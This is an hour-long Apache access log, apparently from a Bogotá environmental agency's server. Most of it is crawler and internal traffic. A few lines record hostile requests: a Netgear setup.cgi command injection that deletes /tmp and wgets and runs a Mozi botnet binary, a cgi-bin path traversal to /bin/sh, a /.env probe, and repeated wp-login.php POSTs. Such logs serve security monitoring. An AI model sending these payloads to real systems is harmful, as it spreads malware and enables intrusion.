191.95.63.140 - - [11/Aug/2022:20:02:34 -0500] "GET /ni-plaga-ni-invasor-el-curi-un-mamifero-dispersor-de-semillas.html HTTP/1.1" 200 782
207.46.13.20 - - [11/Aug/2022:20:02:40 -0500] "GET /BLA/boletinlegal/Circulares/2015/Circular%20No.%201%20del%2010%20de%20Febrero%20de%202015.pdf HTTP/1.1" 304 -
201.245.192.253 - - [11/Aug/2022:20:04:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
157.55.39.98 - - [11/Aug/2022:20:06:19 -0500] "GET /BLA/ HTTP/1.1" 200 538
172.22.2.4 - - [11/Aug/2022:20:04:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.117 - - [11/Aug/2022:20:06:36 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
157.55.39.117 - - [11/Aug/2022:20:06:39 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [11/Aug/2022:20:05:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59310
216.245.221.92 - - [11/Aug/2022:20:07:30 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.65 - - [11/Aug/2022:20:07:54 -0500] "GET /BLA/resoluciones/AUTOS%202022/1290.pdf HTTP/1.1" 200 405838
95.108.213.31 - - [11/Aug/2022:20:08:59 -0500] "-" 408 -
201.245.192.253 - - [11/Aug/2022:20:09:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [11/Aug/2022:20:09:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59310
172.22.2.4 - - [11/Aug/2022:20:10:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [11/Aug/2022:20:12:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2022:20:11:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
172.22.2.4 - - [11/Aug/2022:20:13:46 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000005%20DEL%2030%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [11/Aug/2022:20:13:51 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [11/Aug/2022:20:14:00 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
201.245.192.253 - - [11/Aug/2022:20:14:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [11/Aug/2022:20:14:38 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2885&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1042
172.22.2.4 - - [11/Aug/2022:20:14:39 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2885&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1042
172.22.2.4 - - [11/Aug/2022:20:15:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59310
216.245.221.92 - - [11/Aug/2022:20:17:30 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.109 - - [11/Aug/2022:20:17:35 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.109 - - [11/Aug/2022:20:17:36 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
172.22.2.4 - - [11/Aug/2022:20:16:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2022:20:17:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
95.108.213.35 - - [11/Aug/2022:20:18:59 -0500] "-" 408 -
201.245.192.253 - - [11/Aug/2022:20:19:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
201.245.192.253 - - [11/Aug/2022:20:20:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47034
201.245.192.253 - - [11/Aug/2022:20:20:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 48603
172.22.2.4 - - [11/Aug/2022:20:20:56 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-693-12.docx HTTP/1.1" 200 25737
216.245.221.92 - - [11/Aug/2022:20:22:30 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.84 - - [11/Aug/2022:20:23:01 -0500] "GET /BLA/resoluciones/AUTOS%202019/0738.pdf HTTP/1.1" 304 -
185.119.81.101 - - [11/Aug/2022:20:23:08 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [11/Aug/2022:20:23:09 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [11/Aug/2022:20:22:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [11/Aug/2022:20:24:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
185.119.81.105 - - [11/Aug/2022:20:24:36 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [11/Aug/2022:20:24:37 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [11/Aug/2022:20:23:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
186.154.34.1 - - [11/Aug/2022:20:26:08 -0500] "-" 408 -
172.22.2.4 - - [11/Aug/2022:20:26:16 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2879&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1094
172.22.2.4 - - [11/Aug/2022:20:26:17 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2879&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1094
172.22.2.4 - - [11/Aug/2022:20:26:19 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2879&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1094
216.245.221.92 - - [11/Aug/2022:20:27:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2022:20:27:47 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20C-595-2010.doc HTTP/1.1" 200 39424
207.46.13.188 - - [11/Aug/2022:20:28:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/0471.pdf HTTP/1.1" 200 2712207
87.250.224.102 - - [11/Aug/2022:20:29:00 -0500] "-" 408 -
201.245.192.253 - - [11/Aug/2022:20:29:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [11/Aug/2022:20:28:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2022:20:28:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [11/Aug/2022:20:30:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47034
201.245.192.253 - - [11/Aug/2022:20:30:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 48603
193.56.29.157 - - [11/Aug/2022:20:31:10 -0500] "GET /.env HTTP/1.1" 404 1018
193.56.29.157 - - [11/Aug/2022:20:31:10 -0500] "POST / HTTP/1.1" 200 319
92.118.39.88 - - [11/Aug/2022:20:31:45 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [11/Aug/2022:20:32:30 -0500] "HEAD / HTTP/1.1" 200 -
46.249.32.169 - - [11/Aug/2022:20:33:55 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [11/Aug/2022:20:34:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [11/Aug/2022:20:34:37 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [11/Aug/2022:20:34:38 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [11/Aug/2022:20:34:38 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [11/Aug/2022:20:34:38 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [11/Aug/2022:20:34:38 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [11/Aug/2022:20:34:38 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [11/Aug/2022:20:34:38 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [11/Aug/2022:20:34:38 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [11/Aug/2022:20:34:38 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [11/Aug/2022:20:34:38 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [11/Aug/2022:20:34:38 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [11/Aug/2022:20:33:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2022:20:35:52 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3739&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1043
172.22.2.4 - - [11/Aug/2022:20:35:53 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3739&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1043
172.22.2.4 - - [11/Aug/2022:20:35:55 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3739&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1043
207.46.13.164 - - [11/Aug/2022:20:36:20 -0500] "GET /portaldeninos/aulas-ambientales-2/parque-ecologico-distrital-de-montana-entrenubes/ HTTP/1.1" 200 90406
172.22.2.4 - - [11/Aug/2022:20:34:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58566
207.46.13.148 - - [11/Aug/2022:20:36:36 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
157.55.39.145 - - [11/Aug/2022:20:36:39 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
207.46.13.164 - - [11/Aug/2022:20:36:40 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
157.55.39.50 - - [11/Aug/2022:20:36:40 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
207.46.13.164 - - [11/Aug/2022:20:36:42 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
157.55.39.50 - - [11/Aug/2022:20:36:43 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
207.46.13.164 - - [11/Aug/2022:20:36:45 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
207.46.13.14 - - [11/Aug/2022:20:36:45 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
207.46.13.164 - - [11/Aug/2022:20:36:48 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
207.46.13.14 - - [11/Aug/2022:20:36:47 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/Parque-entrenubes.mp4 HTTP/1.1" 200 10811678
207.46.13.14 - - [11/Aug/2022:20:37:26 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
216.245.221.92 - - [11/Aug/2022:20:37:30 -0500] "HEAD / HTTP/1.1" 200 -
87.250.224.47 - - [11/Aug/2022:20:38:59 -0500] "-" 408 -
201.245.192.253 - - [11/Aug/2022:20:39:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
178.72.78.144 - - [11/Aug/2022:20:39:32 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 1019
191.109.163.183 - - [11/Aug/2022:20:40:01 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
191.109.163.183 - - [11/Aug/2022:20:40:01 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
191.109.163.183 - - [11/Aug/2022:20:40:01 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
172.22.2.4 - - [11/Aug/2022:20:39:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [11/Aug/2022:20:40:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47034
201.245.192.253 - - [11/Aug/2022:20:40:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 48603
172.22.2.4 - - [11/Aug/2022:20:39:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2022:20:40:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
216.245.221.92 - - [11/Aug/2022:20:42:30 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.19 - - [11/Aug/2022:20:42:49 -0500] "GET /distrito-academia-y-sector-privado-plantaron-100-arboles-para-conmemorar-el-dia-de-la-tierra.html HTTP/1.1" 206 1066
69.171.251.3 - - [11/Aug/2022:20:42:50 -0500] "GET /images/actividades-dia-tierra-22-abril.jpg HTTP/1.1" 200 77276
173.252.107.17 - - [11/Aug/2022:20:43:02 -0500] "GET /a-partir-de-manana-1-de-febrero-cambia-el-modelo-de-manejo-de-residuos-hospitalarios-en-bogota.html HTTP/1.1" 206 1044
173.252.83.12 - - [11/Aug/2022:20:43:04 -0500] "GET /images/pieza-residuos-31-enero.jpg HTTP/1.1" 200 47280
173.252.95.112 - - [11/Aug/2022:20:43:07 -0500] "GET /images/jornadas-llantas-usadas-23-mayo.jpg HTTP/1.1" 200 148376
172.22.2.4 - - [11/Aug/2022:20:43:11 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20C-595-2010.doc HTTP/1.1" 200 39424
191.109.163.183 - - [11/Aug/2022:20:43:12 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
191.109.163.183 - - [11/Aug/2022:20:43:12 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
191.109.163.183 - - [11/Aug/2022:20:43:12 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
191.109.163.183 - - [11/Aug/2022:20:43:12 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
191.109.163.183 - - [11/Aug/2022:20:43:12 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
191.109.163.183 - - [11/Aug/2022:20:43:12 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
191.109.163.183 - - [11/Aug/2022:20:43:19 -0500] "POST /appsia/controlador HTTP/1.1" 200 3599
191.109.163.183 - - [11/Aug/2022:20:43:19 -0500] "GET /appsia/jscripts/validarSolicitud.js HTTP/1.1" 404 68
191.109.163.183 - - [11/Aug/2022:20:43:21 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
191.109.163.183 - - [11/Aug/2022:20:43:37 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
191.109.163.183 - - [11/Aug/2022:20:43:44 -0500] "POST /appsia/controlador HTTP/1.1" 200 7728
191.109.163.183 - - [11/Aug/2022:20:43:44 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
201.245.192.253 - - [11/Aug/2022:20:44:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
185.119.81.101 - - [11/Aug/2022:20:45:17 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [11/Aug/2022:20:45:18 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
186.102.36.134 - - [11/Aug/2022:20:45:29 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19R7OuywAv98GlADL+EY82LgkyIDhycQ3ApR829QfycFmPpn2RmVfHhfS2YlENCPycyuTiEOQaqyKNipGdjJJWLPZEc6vJq5tnijy/OVUwHz0w9atNotqt1x3iQoqObRP6iAMDJjQJ267TKeHiGHOktnFFoAvzF2f9arOLMC8bXQomY/lqLoBvThSICRRPetFrDDJMQrcK4oJjqug7OVX0+8WQKzb7tlNWaKe4mpcPH5TvOH+0D3hd01E1iahSPD1HI6s97ds1lEA==&u=U2FsdGVkX19CyBf1aecleTynh+kpQisksNB7fWNbcYNel+sDFPxQCXe8jafXrxDv&y=U2FsdGVkX1+dFexLwoRLDCwIF4ggJBmG32UCw9t9w0WgR2Vwd6mE5t0PfW4/bfW5 HTTP/1.1" 200 25
186.102.36.134 - - [11/Aug/2022:20:45:30 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX19CyBf1aecleTynh+kpQisksNB7fWNbcYNel+sDFPxQCXe8jafXrxDv&y=U2FsdGVkX1+dFexLwoRLDCwIF4ggJBmG32UCw9t9w0WgR2Vwd6mE5t0PfW4/bfW5 HTTP/1.1" 200 25
186.102.36.134 - - [11/Aug/2022:20:45:30 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/vMez1gNHZnoV+x/GHt93KnZzW1a6EQVl6apKOyEJ1M3kuj/gIAjR9Ux/LQGqFwvZ04asdvGM8sdOwqczL65Cctc/PX8a3Eji3X+qXoVrBFnlZK6HJ5ek0k2lMyLzBvoukWeLKCbFQDMUAKZbZfrMOklkoqz8GETM=&u=U2FsdGVkX19CyBf1aecleTynh+kpQisksNB7fWNbcYNel+sDFPxQCXe8jafXrxDv&y=U2FsdGVkX1+dFexLwoRLDCwIF4ggJBmG32UCw9t9w0WgR2Vwd6mE5t0PfW4/bfW5 HTTP/1.1" 200 25
186.102.36.134 - - [11/Aug/2022:20:45:30 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18AZ2BlgNts65ZWcRtUfQ0jd+w2jJgrwJHFm8YNDzscjUeD53xNgbh5lQwQneI06wc31SZXHVTVjDpBh7O+W42nHCXK4OUbFJFD4J5j9d/+7jrwhg4PThEy4ChrcZckkwC8/Cd5F/LG7qeumjZr+CGVKC8fDHdI7Ho=&u=U2FsdGVkX19CyBf1aecleTynh+kpQisksNB7fWNbcYNel+sDFPxQCXe8jafXrxDv&y=U2FsdGVkX1+dFexLwoRLDCwIF4ggJBmG32UCw9t9w0WgR2Vwd6mE5t0PfW4/bfW5 HTTP/1.1" 200 25
186.102.36.134 - - [11/Aug/2022:20:45:31 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18diN6YUiXABnNYMQvZHpjH1d5RmAx/EFnT7CA9NyNi/7nVoMZbVzTLuCzTGZALBQ7rhJWSWzf6h7IKQX3hX04J+mXApVWlltEeaUkGLIrtUpjg33TxMUi8cW2j+I2HekqgiMUoebjt+/6MbcJXGqejqacjpRekVgM=&u=U2FsdGVkX19CyBf1aecleTynh+kpQisksNB7fWNbcYNel+sDFPxQCXe8jafXrxDv&y=U2FsdGVkX1+dFexLwoRLDCwIF4ggJBmG32UCw9t9w0WgR2Vwd6mE5t0PfW4/bfW5 HTTP/1.1" 200 25
186.102.36.134 - - [11/Aug/2022:20:45:31 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18BrGzvSBA59t05F8jn9Bapw+zqAFlrhqncVlP+n5K1SKKjwSAyXj86UYuIFY81/2OaVsqAKBhNxku1h4G5r9UzbZyhs1YU1IUnb9+GHRLoJBVKzeJurP3kSGkOBEcE89ScKQ1tu3GgLUT/VHmkauPBSYutHRHvWX3+K0E7jh0ShEGwMzb/8QckXu89V3x1D7x3erOSdpyJ+Q==&u=U2FsdGVkX19CyBf1aecleTynh+kpQisksNB7fWNbcYNel+sDFPxQCXe8jafXrxDv&y=U2FsdGVkX1+dFexLwoRLDCwIF4ggJBmG32UCw9t9w0WgR2Vwd6mE5t0PfW4/bfW5 HTTP/1.1" 200 25
172.22.2.4 - - [11/Aug/2022:20:45:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [11/Aug/2022:20:47:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2022:20:46:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
201.245.192.253 - - [11/Aug/2022:20:49:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
95.108.213.32 - - [11/Aug/2022:20:49:14 -0500] "-" 408 -
157.55.39.108 - - [11/Aug/2022:20:51:11 -0500] "GET /portaldeninos/wp-content/uploads/2021/10/infografia-fauna-ni%C3%B1os-ambientic-22x75.jpg HTTP/1.1" 200 1480
207.46.13.14 - - [11/Aug/2022:20:52:07 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110281
216.245.221.92 - - [11/Aug/2022:20:52:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2022:20:51:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2022:20:53:19 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [11/Aug/2022:20:53:20 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
157.55.39.98 - - [11/Aug/2022:20:53:34 -0500] "GET /galeria/galeria/fotos/Humedal-Tibanica1G.jpg HTTP/1.1" 200 541579
172.22.2.4 - - [11/Aug/2022:20:53:41 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=4521&usuario=&sector=&fecha=2020&resuelve= HTTP/1.1" 200 1070
172.22.2.4 - - [11/Aug/2022:20:53:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [11/Aug/2022:20:52:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53631
201.245.192.253 - - [11/Aug/2022:20:54:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [11/Aug/2022:20:54:34 -0500] "GET /BLA/boletinlegal/sugerencias.php HTTP/1.1" 200 8615
185.119.81.97 - - [11/Aug/2022:20:54:52 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.97 - - [11/Aug/2022:20:54:53 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [11/Aug/2022:20:56:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
216.245.221.92 - - [11/Aug/2022:20:57:30 -0500] "HEAD / HTTP/1.1" 200 -
45.148.10.193 - - [11/Aug/2022:20:58:21 -0500] "GET / HTTP/1.1" 200 319
185.7.214.117 - - [11/Aug/2022:20:58:32 -0500] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 945
172.22.2.4 - - [11/Aug/2022:20:57:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [11/Aug/2022:20:59:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [11/Aug/2022:20:58:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54814
5.45.207.125 - - [11/Aug/2022:21:00:31 -0500] "-" 408 -
